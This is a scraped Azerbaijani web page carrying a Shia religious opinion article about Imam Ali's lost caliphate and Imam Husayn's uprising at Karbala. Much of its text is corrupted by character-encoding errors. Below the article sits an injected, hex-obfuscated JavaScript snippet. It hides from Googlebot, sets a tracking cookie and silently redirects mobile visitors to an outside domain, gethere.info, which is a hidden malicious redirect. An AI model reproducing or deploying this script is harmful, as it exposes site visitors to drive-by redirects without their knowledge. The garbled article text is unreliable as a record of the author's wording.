INILIFE.RU
Son xəbərlər
Əsas səhifə / Məqalələr / Din / ??sir olan dinin xilaskarA�

??sir olan dinin xilaskarA�

712178_37320HeA� kE�sE� sirr deyil ki, E�ziz islam PeyAYE�mbE�ri (s) dA?nyadan gedE�ndE�n sonra mA?sE�lmanlar SE�qifE�tu BE�ni SaidE�dE� yA�AYA�AYaraq ilahi tE�yinatA� hecE� alaraq A�zlE�rinE� yeni a�?xE�lifE�a�? seA�dilE�r. VE� elE� bu hadisE�ylE� dE� bE�AYE�riyyE�ti zA?lmE�tlE�rdE�n nura dE�vE�t edE�n hE�qiqi islamA� E�sir edE�rE�k, onunla A�z istE�klE�rinE� uyAYun rE�ftar etmE�yE� baAYladA�lar. Bu hadisE� xA?susi olarq A�mam ??linin (E�) haqqA�nA�n tapdalanmasA� vE� dinin vacib gA�stE�riAYlE�rindE�n birinin dE�yiAYmE�silE� E�sarE�tin baAYlanAYA�cA� oldu. HamA�ya mE�lumdur ki, E�lE� keA�irilE�n E�sirlE� A?A� cA?r rE�ftar edilir. YE�ni mA?haribE� edE�n iki dE�stE�dE�n biri, o birisindE�n dA�yA?AY E�snasA�nda E�sir alA�rsa, onunla bir neA�E� istiqmE�tdE� rE�ftar edE� bilE�r. Bir sA�zlE� ya hE�min E�siri azad etmE�lidir, ya A�ldA?rmE�lidir, ya da ki, satmalA�dA�r. Bu dE�fE� E�sarE�tE� alA�nan peyAYE�mbE�rin ilahi tE�yinat E�sasA�nda A?mmE�tE� rE�hbE�r tE�yin etdiyi AYE�xs idi. BelE� ki, A�mam ??linin XilafE�t haqqA�nA�n E�lindE�n alA�nmasA�, PeyAYE�mbE�rin (s) son hE�cc sE�fE�rindE� a�? Sizin aranA�zda iki aAYA�r E�manE�t qoyuram, biri AllahA�n kitabA�, digE�ri mE�nim ??hli-beytima�? tapAYA�rA�AYA�na mE�hE�l qoymamaq demE�k idi. Dediyimiz kimi A�mam ??lini (E�) XilafE�tini qE�sb etmE�k Allah dininin E�sarE�tE� alA�nmasA�, nE�zE�rE� alsaq ki, hE�min dA�vrdE� Qurani-KE�rimi dE� HE�zrE�t ??li kimi bilE�n yox idi, onda cox rahat deyE� bilE�rik ki, bA?tA?n bunlar elE� hE�qiqi A�slamA�n E�sarE�t altA�na alA�nmasA� idi. Cox tE�E�ssA?f A�hissiylE� qeyd edirE�m ki, butA?n bunlar tarixdE� acA� hadisE�lE�r kimi baAY verdi vE� insana-insanA�n A�zA?nA? tanA�tdA�ran, ona dA?zgA?n istiqamE�t verE�n xoAYbE�xt sonluAYa, E�bE�di sE�adE�tE� A�atdA�ran bir din mA?sE�lman cildindE� olanlarA�n E�lindE� yadlaAYaraq A�z E�sl mahiyyE�tini bE�zi hallarda itirdi. A�slamA�n A�zA?nA?n olmamasA�, hE�qiqi A�slamA� insanlA�AYa A�atdA�ranlarA�n hA?quqlarA�nA�n mE�hdudlaAYdA�rA�lmasA� dinin E�sarE�tiylE� nE�ticE�lE�ndi.
Qeyd etdiyim kimi indi nE�fsinE� qulluq edE�n, gA�zlE�rini hakimiyyE�t tutmuAY, mA?sE�lman cildinE� girmiAY saxtakarlar bu a�?E�sirlE�a�? rE�ftarlarA�nA� mA?E�yyE�nlE�AYdirmE�li idilE�r. Onu yE�ni E�sir olan A�slamA� azad etmE�k olmazdA�. ZatE�n E�sarE�tE� alA�nmaqla onun azadlA�AYA�nA� mE�hdudlaAYdA�rmaq E�sas hE�dE�f idi. ??sarE�tdE�n sonrakA� azadlA�q da mA?mkA?n deyildi. A�A?nkA? onun azadlA�AYA� hakimiyyE�tin tE�hvil verilmE�si ilE� vE� yaxud baAYqa sA�zlE� azadlA�AYA� ozA?nE� qaytarA�lmA�AY dinin E�dalE�ti bE�rpa etmE�siylE� nE�ticE�lE�nE�cE�kdi. Bu E�siri azad etmE�k onu E�sir edE�nlE�rE� sE�rf etmirdi. BaAYqa bir tE�rE�fdE�n dE� onu A�ldA?rE� dE� bilmirdilE�r. BelE� olan vE�ziyyE�tdE� bu dini canA�yla qorumaAYa mA?kE�llE�f olan A�mam ??li (E�) var idi. AllahA�n aslanA�nA�n a�? NE� qE�dE�r ki, mE�nE� zA?lm edirlE�r mE�n sE�br edirE�m, nE� vaxt gA�rdA?m A?mmE�t, din zA?lmE� mE�ruz qalA�b qarAYA�larA�nda mE�ni gA�rE�cE�klE�ra�? demE�si bunu sA?but edir. On dA�rd mE�sumun hE�r biri hE�qiqi A�slamA�n carA�A�sA� vE� A�lahi tE�yinat E�sasA�nda bu iAYin E�n mA?kE�mmE�l icraA�A�larA� olmuAYlar. A�slam ilahi dinlE�rin E�n kamili olaraq insanlarA� E�dalE�tli yaAYayA�AYa dE�vE�t edir. BelE� olan halda onun azadlA�AYA� E�dalE�t prinsiplE�rinE� zidd hE�yat tE�rzi sA?rE�n zA?lmkar hakimiyyE�tlE�rin iAYinE� heA� cA?r yaramA�rdA�.
Bir mA?ddE�t tarixi hadisE�lE�rin dE�yiAYkE�n gediAYatA� xA?susE�n A�mam ??linin (E�) AYE�hadE�tinE� qE�dE�r olan dA�vr, onun hE�yatda olmasA� dini E�sir alanlar tE�rE�findE�n islamA� dE�yE�rlE�rin tE�mamilE� mE�hvinE� E�n bA�yA?k maneE� idi. MA�minlE�r ??mirinin AYE�hadE�tilE� hE�lE� onun da zahiri XE�lifE�liyi dA�vrA?ndE� baAY qaldA�rmA�AY vE� mE�rkE�zi hakimiyyE�tE� itaE�tsizliyi ilE� yadda qalmA�AY E�vvE�lki xE�lifE�lE�r dA�vrA?ndE� qohumluq E�laqE�lE�ri E�sasA�nda Azama vali tE�yin olunmuAY MuaviyE� vE� ona bE�nzE�rlE�r A�slamA� aradan aparmaq arzusunda olduqlarA�nA� aA�A�q AYE�kildE� bildirmE�sE�lE�rdE� bA?tA?n gA?clE�rini A�slam hE�qiqE�tlE�rinin mE�hvinE� sE�rf etdiklE�ri cox aydA�n bir mE�sE�lE�dir. SadE�cE� SiffeyndE� MuaviyE� vE� tE�rE�fdarlarA�nA�n tA�rE�tdiyi cinayE�tlE�r, AzamdakA� zA?lm hakimiyyE�ti bunlarA� bilmE�yE� aAYA�l sahiblE�ri A?A�A?n kifayE�tdir. NiyE� mE�hz aAYA�l sahiblE�ri deyirE�m, hE�qiqi aAYA�l sahiblE�ri ancaq hE�qiqE�ti olduAYu kimi dE�rk edE� bilE�rlE�r.
ElE� bu gA?nn dE� belE�dir. DA?nE�n vE� ondan E�vvE�l olduAYu kimi. SonrakA� hadisE�lE�r hamA�ya mE�lumdur. A�mam HE�sE�nin (E�) AYE�hadE�ti vE� nE�hayE�t AzE�hidlE�r sE�rvE�ri A�mam Huseynin (E�) dini E�sarE�tdE�n xilas edE�n KE�rbE�la qiyamA�. ??zadarlA�AYA� A�mam Huseyn (E�) tutulan yas mE�rasimlE�rini geridE�qalmA�AYlA�q, xurafat dindE�n kE�nar hadisE�lE�r kimi qE�lE�mE� verE�nlE�ri bir mE�nada qA�namaq olmur. A�A?nki bu E�zE�mE�tli hadisE� E�sir olan A�slama hE�qiqi azadlA�q bE�xAY etdi. A�slamA� olduAYu kimi dE�rk edib yaAYamaq isE� AllahA�n insana bE�xAY etdiyi E�n ali nemE�t olan aAYA�l vasitE�silE� mA?mkA?ndA?r. ??qli E�sarE�tdE� olandan A�slam dA?AYA?ncE�si gA�zlE�mE�k sadE�lA�vlA?kdE�n baAYqa bir AYey deyildir. A�mam Huseyn (E�) sanki insanlarA�n E�lindE�n alA�nmA�AY aAYA�llarA�nA� A�z qiyamA�yla onlara qaytardA�. A�z altA� aylA�q kA�rpE�sini AYE�hid vermE�klE� bA?tA?n insanlara, bE�AYE�riyyE�tE� bir daha saAYlam dA?AYA?ncE� tE�rzini qaytardA�. Sanki deyirdi qoy bu gA?n mE�nim ??li ??sgE�rimi oxlasA�nlar, ??li ??kbE�rimi tikE� tikE� doAYrasA�nlar, ??bE�lfE�zlimin qollarA�n kE�ssinlE�r, Qasimim AYE�hid olsun, E�n dE�yE�rli insanlarA�n vE� A�z qanA�m axA�dA�lsA�n, ZeynE�bim, RA?qE�yyam E�sir olsun, amma bA?tA?n bunlarA�n E�vE�zindE� A�slam azad olsun, mE�ndE�n sonra gE�lE�nlE�rin oAYurlanmA�AY aAYA�llarA�n, dA?AYA?ncE�lE�rin A�zlE�rinE� qaytaram ki, E�sl A�slamA� axtarA�b tapa bilsinlE�r.
Onlar: “??gE�r biz qulaq asA�b aAYlA�mA�zA� baAYA�mA�za yA�AYsaydA�q, cE�hE�nnE�m E�hli iA�indE� olmazdA�q!” – deyE�cE�k, (MA?lk ayE� 10)
A�mam Huseyn (E�) A�z qanA�yla A�slamA� E�sarE�tdE�n xilas etdi. Salam olsun o insanlara ki, hE�qiqi A�slamA� yaAYadana E�za saxlayA�rlar…!
A�
ElA�in QasA�mov
xacmazmescidi.com

 

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Scroll To Top